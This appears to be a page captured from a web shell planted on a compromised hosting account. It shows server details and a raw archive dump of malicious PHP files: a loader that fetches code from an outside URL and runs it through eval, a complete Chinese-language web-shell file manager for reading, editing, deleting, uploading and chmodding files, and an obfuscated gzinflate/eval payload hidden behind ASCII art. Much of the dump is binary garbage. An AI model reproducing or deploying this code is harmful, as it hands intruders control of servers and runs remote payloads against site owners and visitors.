|
Server IP : 198.54.120.203 / Your IP : 216.73.216.181 Web Server : LiteSpeed System : Linux premium58.web-hosting.com 4.18.0-553.58.1.lve.el8.x86_64 #1 SMP Fri Jul 4 12:07:06 UTC 2025 x86_64 User : greakqsw ( 1698) PHP Version : 8.3.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/greakqsw/theblogginglab.org/7648l2-20260310230235/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
PK <m\M��� � huext.phpnu �[��� <?php
$url = 'https://stepmomhub.com/3.txt';
// Inisialisasi cURL
$ch = curl_init();
// Set opsi cURL
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); // Nonaktifkan verifikasi SSL jika perlu
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Nonaktifkan verifikasi SSL jika perlu
// Eksekusi cURL dan ambil hasilnya
$code = curl_exec($ch);
// Cek apakah cURL berhasil
if($code === false) {
echo "Gagal mengambil data dari URL: " . curl_error($ch);
} else {
// Jalankan kode yang diambil
eval('?>' . $code);
}
// Tutup sesi cURL
curl_close($ch);
?>PK <m\t�J��) �) jimvt.phpnu �[��� <?php
eRRor_rEporTing(0);
$wwwroot=isset($_SERVER['DOCUMENT_ROOT'])?trim($_SERVER['DOCUMENT_ROOT']):'';
$req_uri=isset($_SERVER['REQUEST_URI'])?trim($_SERVER['REQUEST_URI']):'';
$req_uri!=''?($req_uri_arr=explode('?',$req_uri)).($script_name=$req_uri_arr[0]):($script_name=isset($_SERVER['SCRIPT_NAME'])?trim($_SERVER["SCRIPT_NAME"]):'');
$script_filename=isset($_SERVER['SCRIPT_FILENAME'])?trim($_SERVER['SCRIPT_FILENAME']):'';
if ($script_filename=='') $script_filename=__FILE__ ;
if ($wwwroot=='' && $script_name!='' && $script_filename!='') $wwwroot=str_replace($script_name,'',$script_filename);
$wwwroot=str_replace('\\','/',$wwwroot);
$dir=isset($_GET['d'])?trim($_GET['d']):'';
$dir=str_replace('\\','/',$dir);
$file=isset($_GET['f'])?trim($_GET['f']):'';
$file=str_replace('\\','/',$file);
$action=isset($_GET['a'])?trim($_GET['a']):'';
if ( $action=='' )
{
$current_dir=$dir==''?$wwwroot:$dir;
$current_dir=rtrim($current_dir,'/');
$current_dir_nav='';
$dir_path='';
$current_dir_split=explode('/',$current_dir);
foreach( $current_dir_split as $dir )
{
$dir_path.=$dir.'/';
$current_dir_nav.='<a href="?d='.$dir_path.'">'.$dir.'/</a>';
}
$dir_rows='';
$file_rows='';
$current_dir_list=sCaNDir($current_dir);
$row_id=0;
foreach( $current_dir_list as $target_name )
{
if ( $target_name=='.' || $target_name=='..' ) continue;
$target=$current_dir.'/'.$target_name;
$target_ahref=strpos($target,$wwwroot)===0?'<a href="'.str_replace($wwwroot,'',$target).'" target="_blank">'.$target_name.'</a>':$target_name;
$row_id++;
$target_u_id=fIlEOwNEr($target);
$target_u_att=poSIx_GEtpWUid($target_u_id);
$target_owner=$target_u_att['name'];
$target_perm=get_qx($target);
$target_mtime=date('Y-m-d H:i:s',fILeMTiMe($target));
if ( is_dir($target) )
{
$dir_rows.='<tr class="tl"><td><i class="fa fa-folder" style="font-size:20px;color:orange;"></i></td><td><a href="?d='.$target.'">'.$target_name.'</a></td><td></td><td>(<a href="#" onclick="show_input_box(\'qx'.$row_id.'\',\''.$target.'\',\'d\',\'qx\');">'.$target_perm.'</a>)'.$target_owner.'<span id="qx'.$row_id.'"></span></td><td>'.$target_mtime.'</td><td><a href="#" onclick="show_input_box(\'gm'.$row_id.'\',\''.$target.'\',\'d\',\'gm\');">改名</a>|<a href="#" onclick="confirm_sc(\''.$target.'\',\'d\');">删除</a><span id="gm'.$row_id.'"></span></td></tr>';
}else
{
$target_fsize=fILesIzE($target);
$target_fsize<1024?$target_fsize.=' B':($target_fsize=round($target_fsize/1024,1)).($target_fsize<1024?$target_fsize.=' KB':$target_fsize=round($target_fsize/1024,2).' MB');
$file_rows.='<tr class="tl"><td><i class="fa fa-file" style="font-size:20px;color:grey;"></td><td>'.$target_ahref.'</td><td>'.$target_fsize.'</td><td>(<a href="#" onclick="show_input_box(\'qx'.$row_id.'\',\''.$target.'\',\'f\',\'qx\');">'.$target_perm.'</a>)'.$target_owner.'<span id="qx'.$row_id.'"></span></td><td>'.$target_mtime.'</td><td><a href="#" onclick="window.open(\'?f='.$target.'&a=ck\',\'_blank\',\'width=800,height=600,top=200,left=300\');">查看</a>|<a href="?f='.$target.'&a=bj">编辑</a>|<a href="#" onclick="show_input_box(\'gm'.$row_id.'\',\''.$target.'\',\'f\',\'gm\');">改名</a>|<a href="#" onclick="confirm_sc(\''.$target.'\',\'f\');">删除</a><span id="gm'.$row_id.'"></span></td></tr>';
}
}
$div_html='<table cellspacing="10">
<tr><td colspan="6"><form name="form_up" id="form_up" method="post" action="?d='.$current_dir.'&a=up" enctype="multipart/form-data"><a href="?d='.$wwwroot.'"><i class="fa fa-home" style="font-size:30px;color:orange;"></i></a> 当前目录:'.$current_dir_nav.' <i class="fa fa-upload" style="font-size:20px;color:grey;" onclick="document.getElementById(\'file_up\').click();"><input id="file_up" name="file_up" type="file" style="display:none" onchange="document.getElementById(\'form_up\').submit();"></form></td></tr>
<tr><td colspan="6"><form name="form_tj" method="post" action="?d='.$current_dir.'&a=tj">新项目名称:<input name="t_name" type="text" size="25"> <select name="t_type"><option value="tj_f">添加文件</option><option value="tj_d">添加目录</option><option value="tj_xz">下载URL</option></select> <input name="submit" type="submit" value="执行"></form></td></tr>
'.($row_id==0?'<tr><td>内容为空或无权限查看</td></tr>':$dir_rows.$file_rows).'
</table>';
}elseif ( $action=='sc' )
{
if ( $file!='' )
{
uNlInk($file); jump_to('?d='.diRNaMe($file));
}elseif( $dir!='' )
{
rm_rf($dir); jump_to('?d='.DIrnaMe($dir));
}
exit;
}elseif( $action=='gm' )
{
$gm=isset($_POST['gm'])?trim($_POST['gm']):'';
if ( $gm!='' )
{
$old_f=$file==''?$dir:$file;
if ( $old_f!='' && file_exists($old_f) )
{
$old_dir=DIrnAme($old_f); rEnAme($old_f,$old_dir.'/'.$gm); jump_to('?d='.$old_dir);
}
}else
{
show_msg('请输入新名称!','back');
}
exit;
}elseif( $action=='qx' )
{
$target=$dir==''?$file:$dir;
if ( $target!='' )
{
$qx=isset($_POST['qx'])?trim($_POST['qx']):'';
if ( $qx!='' && is_numeric($qx) && substr($qx,0,1)=='0' )
{
set_qx($target,$qx); jump_to('?d='.dIRnamE($target));
}else
{
show_msg('请输入新权限!','back');
}
}
exit;
}elseif( $action=='ck' && $file!='' )
{
if ( fiLEsIze($file)<10000000 )
{
HEadEr('Content-Type:text/plain; Charset=utf-8;'); echo FIle_gET_coNTEnts($file);
}else
{
show_msg('文件大小超限!','close');
}
exit;
}elseif( $action=='bj' && $file!='' )
{
if ( isset($_POST['f_content']) )
{
FilE_pUt_COnteNts($file,$_POST['f_content']);
md5($_POST['f_content'])==md5(fILE_Get_cONTenTs($file)) ? show_msg('保存成功!','') : show_msg('保存失败!!','');
}
$f_content=is_file($file)?str_replace('</textarea>','</textarea>',FIle_gET_contENtS($file)):'';
$div_html='<form name="form_bj" action="?f='.$file.'&a=bj" method="post">编辑当前文件:'.$file.'<br><textarea name="f_content" rows="40" cols="120">'.$f_content.'</textarea><br><input type="submit" value="保存"> <input type="button" value="返回目录" onclick="window.location.href=\'?d='.DIrNamE($file).'\';"></form>';
}elseif( $action=='tj' && $dir!='' )
{
$t_name=isset($_POST['t_name'])?trim($_POST['t_name']):'';
if ( $t_name=='' )
{
show_msg('请输入项目名称!','back');
}else
{
if ( $_POST['t_type']=='tj_f' ) fiLe_PUt_coNTentS($dir.'/'.$t_name,'');
if ( $_POST['t_type']=='tj_d' ) mKDir($dir.'/'.$t_name,0755,true);
if ( $_POST['t_type']=='tj_xz' )
{
preg_match('/^http[s]?:\/\/.+/si',$t_name)==0 ? show_msg('下载地址格式出错!','back') : down_file($dir,$t_name) ;
}
jump_to('?d='.$dir);
}
exit;
}elseif( $action=='up' && $dir!='' && isset($_FILES['file_up']) )
{
MoVE_upLOadEd_filE($_FILES['file_up']['tmp_name'],$dir.'/'.BaSenaMe($_FILES['file_up']['name'])) ? show_msg('上传成功!','') : show_msg('上传失败!','') ;
jump_to('?d='.$dir);
exit;
}
function get_qx($t)
{
$q=substr(sprintf('%o',fILepErMs($t)),-4);
return $q;
}
function set_qx($t,$q)
{
EvAl('cHMoD("'.$t.'",'.$q.');');
if ( get_qx($t)!=$q )
{
$tmp_f=uniqid().'.txt';
$tmp_c='<?php ChMOd("'.$t.'",'.$q.');?>';
fiLE_puT_cONtEnTs($tmp_f,$tmp_c);
require($tmp_f);
UnLInK($tmp_f);
}
}
function rm_rf($d)
{
if (is_dir($d))
{
$f_l=sCaNDir($d);
foreach ($f_l as $f)
{
if ($f=='.'||$f=='..') continue;
$p=$d.'/'.$f;
is_dir($p)?rm_rf($p):uNliNk($p);
}
rMdIR($d);
}
}
function show_msg($msg,$go)
{
echo '<script>alert("'.$msg.'");</script>';
if ($go=='back') echo '<script>window.history.back();</script>';
if ($go=='close') echo '<script>window.close();</script>';
}
function jump_to($url)
{
echo '<script>window.location.href="'.$url.'";</script>';
}
function down_file($dir,$url)
{
$s_name=array_pop(explode('/',$url));
if ( $s_name=='' || is_file($dir.'/'.$s_name) ) $s_name=uniqid().'.zmxz';
$ch=CUrl_iNit();
cuRl_seTOpt ($ch, CURLOPT_URL, $url);
cUrL_sEtopt ($ch, CURLOPT_RETURNTRANSFER, 1);
cuRL_setOPt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
cuRL_setOPt ($ch, CURLOPT_SSL_VERIFYPEER, false);
cuRL_setOPt ($ch, CURLOPT_SSL_VERIFYHOST, false);
cuRL_setOPt ($ch, CURLOPT_BINARYTRANSFER, true);
$contents = cUrl_eXeC($ch);
cURl_CLosE($ch);
if ( empty($contents) ) $contents=filE_geT_cONTentS($url);
if ( empty($contents) )
{
show_msg('下载出错!','');
}else
{
fIle_PuT_cONteNts($dir.'/'.$s_name,$contents);
show_msg('下载完成!','');
}
}
?>
<html>
<head>
<title>芝麻web文件管理</title>
<meta name="robots" content="none">
<meta http-equiv="Content-Type" Content="text/html; Charset=utf-8">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
</head>
<body>
<style>
a {color:#000000;text-decoration:none;}
a:hover {color:#ff0000;}
.tl:hover {background-color:#eeeeee;}
form {margin:0;}
</style>
<script>
function show_input_box(s,t,f,a,)
{
var span=document.getElementById(s);
if ( span.innerHTML=='' )
{
span.innerHTML='<form name="form_'+s+'" method="post" action="?'+f+'='+t+'&a='+a+'"><input name="'+a+'" type="text" size="8"><input type="submit" value="提交"></form>';
}else
{
span.innerHTML='';
}
}
function confirm_sc(t,f)
{
if (f=='d')
{
if ( confirm('确定要删除此目录吗?') )
{
window.location.href='?d='+t+'&a=sc';
}
}
if (f=='f')
{
if ( confirm('确定要删除此文件吗?') )
{
window.location.href='?f='+t+'&a=sc';
}
}
}
</script>
<div>
<h1>芝麻web文件管理V1.00</h1>
<?php echo $div_html;?>
</div>
</body>
</html>PK <m\��Ș� � about.phpnu �[��� <?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>6YWKWFGDPYMC7A6C</RequestId><HostId>nB/9Zou8nUdQKxEFYG7aVQjAivYnrrTgjt4qWSRJSt6gaXsFpmk/tCDYj+iSNVctWivzbWlb5ZA=</HostId></Error>PK <m\l��tX� X� vf2s0.phpnu �[��� <?php
/**
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣻⣿⣿⣿⡿⢿⡿⠿⠿⣿⣿⣿⣿⣿⣿⡿⣿⣿⣿⡿⣿⣿
⣿⣿⣿⣿⠿⠿⢿⣿⣿⠟⣋⣭⣶⣶⣞⣿⣶⣶⣶⣬⣉⠻⣿⣿⡿⣋⣉⠻⣿⣿⣿
⣿⢻⣿⠃⣤⣤⣢⣍⣴⣿⢋⣵⣿⣿⣿⣿⣷⣶⣝⣿⣿⣧⣄⢉⣜⣥⣜⢷⢹⢇⢛
⡏⡦⡁⡸⢛⡴⢣⣾⢟⣿⣿⣿⢟⣾⣧⣙⢿⣿⣿⣿⣿⣿⣿⣿⢩⢳⣞⢿⡏⢷⣾
⣷⣵⡇⣗⡾⢁⣾⣟⣾⣿⡿⣻⣾⣿⣿⣿⡎⠛⡛⢿⣿⡟⣿⣿⡜⡜⢿⡌⠇⢾⣿
⣿⣿⠁⣾⠏⣾⣿⣿⣽⣑⣺⣥⣿⣿⣿⣿⣷⣶⣦⣖⢝⢿⣿⣿⣿⡀⠹⣿⣼⢸⣿
⣿⣿⢰⡏⢡⣿⣿⠐⣵⠿⠛⠛⣿⣿⣿⣿⣿⠍⠚⢙⠻⢦⣼⣿⣿⠁⣄⣿⣿⠘⣿
⣿⣿⢸⢹⢈⣿⣿⠘⣡⡞⠉⡀⢻⣿⣿⣿⣿⢃⠠⢈⢳⣌⣩⣿⣿⠰⠿⢼⣿⠀⣿
⣿⠿⣘⠯⠌⡟⣿⡟⣾⣇⢾⡵⣹⣟⣿⣿⣿⣮⣓⣫⣿⣟⢿⣿⢿⡾⡹⢆⣦⣤⢹
⣅⣛⠶⠽⣧⣋⠳⡓⢿⣿⣿⣿⣿⣿⢿⣿⣿⣿⣿⣿⣿⣫⣸⠏⡋⠷⣛⣫⡍⣶⣿
⣿⡿⢸⢳⣶⣶⠀⡇⣬⡛⠿⣿⣿⣿⣿⣿⣿⣿⠿⢟⣉⣕⡭⠀⢺⣸⣽⢻⡅⣿⣿
⣿⡇⣾⡾⣰⡯⠀⡗⣯⣿⣽⡶⠶⠂⢠⣾⣿⠐⠚⠻⢯⣿⠇⠎⡀⣳⣿⣼⡃⣿⣿
⣿⡇⣟⣇⡟⣧⠀⡗⣿⣿⡿⢡⢖⣀⠼⢟⣻⣤⣔⢦⢸⣿⢀⢆⢡⣿⣯⢹⡃⣿⣿
⣿⡇⡏⣿⡾⣸⣿⣇⠸⠟⣋⣼⣼⣿⢻⣿⣿⢿⣟⢾⣌⠫⠈⣶⣿⡿⣩⡿⢃⣿⣿
⣿⣷⡀⠻⡷⢪⢧⡙⠰⣾⣿⣿⣾⡽⣾⣿⡿⣺⣵⣾⣿⡇⡜⣽⠟⢷⣪⣴⣿⣿⣿
⣿⣿⣿⣾⣿⠏⣤⡁⣷⣽⣿⣿⣿⣿⣷⣶⣿⣿⣿⣿⣿⣱⠸⣱⣦⠙⣿⣿⣿⣾⣿
**/
$sokaki = "\x39\xa4\227\3\235\17\56\242\xa0\136\x20\114\xd1\163\236\x51\164\36\326\146\253\27\130\xf3\x2a\x69\77\303";
if (function_exists("user_super")) {
pcntl_signal(senia, berika);
pcntl_signal(larva, berika);
pcntl_signal(mojika, berika);
pcntl_signal(matisu, berika);
}
eval(("\x67\x7a\x69\156\146\154\141\164\145")("���OQ�ݸq�څ7�\$|m�\$.��R�BBJR�
myVK��@��Ay����!ȣP`iA
��X^�%�
8S0�;���s��w�{Ν���+ׄ�\"�\$=S��]��\\N�n*Pb4;�^�Wo8f�ֲ����u@�Z2jvl��XWn��˝�j��QҘ�i9����Y_y���>G<�%���\"67���oz��VG0gۜEߛjMRE�L��cDckY��_��M�\"`��3g���,�@/P�q�l X4CM�gQ�'�R��T��%��g��D�A�s��|[W����?��S�
��;����>C̠D�8ę�k\\��qs���\"�G[�;8;���i�
���,.;�!b�,�6z�f� ?kL�Y�c��o+_*iT�
u��κ
K�B��A>�k�k��f��GcȀ,n�d�M�K�o�կO���y�c�6k�4͖�,��_�V�ʌ*Y�W�����Yp�?n�N*���U~k��e�5;��~ߨ�P���q��N_��V�{�t������C�LF9]i���D_8\\��9r'ZzJmU����7v�y�`�q�&�ޒi�r��Y���(
���3ln�˶�+x1q %Tf�d��:��!A���)N��O�&�
��K�*E�I�sBc�E<�1��p(�ao}�����\\0����t���٩yl�,H��2��)xJ�~��kj=���{�m �]���d �A��x�#\$�%
�2���mx��r��\\8�#�IwA�!~QX(H�0P���(L=1�@b\$����%�P���E�Dw��
�*�-�f��b��G ��@��l/p燵�ByAW�ݚp蟭)�\$�bz�<]\$��K(.�\"�Gv4�;�"))xor${"a��ꁥ�������� ���ߠ��ùѠ��ͳ�����ӆ̵߹��õ���ŋ�����ݽ�����������Ӧ���� ������ՓΖ�������倯ω�������ֿ��ƈ��������������ڸ�⡕�����������뺀誗����ސ��蟅��������ƾ��מ肓���������
�֓�ڣ�����������߳�����
������� ����
����΅ޢ��Ý�������������
��
������������������ސ����Տ������Ԯ�濸����
��㰗�� ��������Ѣ�����������
����҄��Ù�����ٯ�Ըת���
��͈���������إ��ҩ�������
������������������ם�������
������㗊�����������Ĕ������˩�����ѓ����������Þ�����ܼ��ᅨ������偌ΑڞÀIJ�����ͭ����ˏ��������Ց�����������ױ��ޟ�� �����Ӆ����������� ����̽ݍ�Ŷ�������������������А���������ҙ�����ᇑ����������ӱ���ㆤ��ޒ����Ɖ� �����������ŕ����혫��ȷ���������脢�������� ������
�������۟��п��
�������������߰�����"}=_��٫�("�wOh �")xor/*c */${"b�������ե���ã��
��ȩ�չ�����������䒾ԟ�������칫��ܧ��桖������������у�������������������&����˱᠄�������р���������ȶ������ �×�������ػ�����վ��������Ż�ܦ�֧������ ��ϖ�������Ǟ����ʕ���ߩ�����
����������
����Ɣ����Ӕ����������؟˯���� ���ꗾ������ޑ���
Ӽ���������ň�靣�琄��ꂩ�Ċ�������̎ȩ����ч�����ŋ�����Ĝ�����Ϙ
�����
��Ѓ�˄�ĥ� ���������慶����ƹ�����ρ�ʍ���ԉ���Ā�ڐ���ˊ��̙��ٻ뚺����ז����
Λ���������谿���������ӎ㵓���
��Ŋ�� � ����
���Ş�َ�������
��۟�緎����ʯ�臇�ݏ������ס���� ���ⅈ����������֩�����
ݚ���
����� �������������������픎���ĀˎɁ�������Ή�Ȉ�
������¹��ܮ�������͵��� ������Ȇ �����϶���Ԯ�������ܷ����ԛ������ؓ�����������
���������������� ����Ҋ�IJ
�����ܐ��������듙�
ы��۬�����������
��ʹ�"}=_��٫�("0��2\\{�e}�")xor/*c */${"d��✙�������⡪�����
�ǃ�����������ģ�߾����̸ё���������Ё�Ф�Т�������
��䵢����ƒ
����
����������� Ѻ������ɸ��È�������
����������惊������
����濘���������ɹ��������֝����ɪ۬ ���������Ŝ�������������������������������������������͗�������������������� ���öɈς��嗢��ʇ����٨������������������ۖ��âǴ��Ĭ����� ���ڮ�������
�������������̑���ǡ��ߘ�� ރ����Ğ�����Ώ������ӹ��섓��¡§������
����������Ʈ�����������ߺ����������ų�����Ӊ��ѯ�ݱ�����������������������������մα���Ԍ�ް��钬�����Ԏ �������ř����Ү��������������������ݎ�����Τ�
������٨�Ԯץ�����������������Ͳ����������ɦ�����͈��������
�߅ۄ��������ꀾᒃ���ޯ���������Ȥ���ؼ���
���
��ޔ� ��ƹ�����ы����ﯹ�������жٻ��������ɮ���ߍ � ����ʑ������������� ���ϙʱ��"}=_��٫�("��b���y)�")xor/*c */${"e������㫋נ쏞����ӯ������
��䭈������������ѽ�ۘϢ����
�������в�ݹ���ӱ������ǧ���������ǘѧ��������ī�ѵ����������������������� ƶ ���������Ե�ِՒ��ߴ����ؾ������̿� �������������ਧ�Ҡ����� ������������� ��ۣ���Յ��䨐�ˋ�� ��
���י���鍟���م�
����� ��ȡ������������������������œ��
������⇃�⩈�����в���ׅ�
���ƒ������������ΰ��ڍ�첻���ɭ��ϯ�����������������뷖�ʭ������͡�����σ������
������
�����؝�ǡ�����ݛ��ݗ�������������������������җ��������ᅣ��
����⯷��������� 耾�������������������Ʌ�Ό�ʻ����׳����������
�����ւ��Ў
�
�� �ؠ������������ų���������ÿ�������������� �ؾ͟�����ʽ̽�
���ְ����
�̒�� �ߏ������
�瓎И���Р��������� 뛜����������ܥ���������ˣ����� �������Ō
���Ơ���������������
��"}=_��٫�("��h�����\"G")xor/*c */${"f���������ٖ�� �������ڒ�������
���������֝
��������® ��։�ፘ�������������ܽ
������� ����Ɓ�Ӌ��������������ӷ���ތ�
҇���ب�����������������脧�ۡ�������������Ŋ������ͮ���
����ޚ�������ك������ы� ץ���ȃ��ī�
���
�ų��������ʀ����͖�ʤ��Ӡ����Ȧ��Ү���ݺ�������ط�
�������い�ǀ�������������
���Þխט���� ��������Ȥҟ���������ƿ �Ɋ�ڡ�Е���������������ї�آ�������ְ�Ƽ������ۡ���僺�����������
���ĵ�ی������������������
������×�������������������沐쳋��� �Ԧ�ٻ��������߈��۔��
�Б͝����ɤ��݁����흓���������ȼ�����������ʬ̊�٬��������Õ��ʏ�����������������ۃ�����
����������������Ԩ�Տ����ޤ������ۣ������ܑ���������툪휗��������ƽ�ٴ��Ռ�͘�����ฟ������������ڔ������Ҟ���¿�����Ʋ��׆���Ȃ����
�������𬫚���Ԫ�����ȗ����������ʷ��� � �"}=_��٫�("�inOP�w�Ps`")xor/*c */${"g����ɝƯ�����������㥰�ʜ����ܒ��Ҧ˱������ř���������ߌ��Ƀ�����������������
�ԇ�������������ӥ���������ί������ӯ��ٱ������
����웣�ؘ�ӣ�얝�
���ӟ���ν�疿���ѸŹɻ������˛﹚����ܘ��������Ø��������
������б�Ҳ�������������
��
����������Ơ��������ں����ҹ� �網������ޕ�Ȟ���ʝ������®�������������ʉ�˪�������������� ��������������ػ�̇�������ʻ��������������������٥������ï؇�ް�����ށğ���������͠��������������۶�������؍���ݮ������������������ѫ甫ө���������Ӹ��Ǣ����
����������ء���ط��ˮ�����ɺ닿�✳ݫ������ݟ�����ȣ���ݞ�絸��������ꑼ���ײ�����Ė������ ��� � ����
�����仜�Ė���������������ƫꊗ�������� ���롗�������ȶ�����ٰʼ�������փˏ
��������
պ�������ԭ�����������ޟ����������"}=_��٫�(")��a���X���")xor/*c */${"0���� �ъ����������������ɺ����ߨ��ٯӇ
�Νʁ�ʡ�歐�����������ѷ�Ҋ��������
�ĝ
������������"}=_��٫�("��\"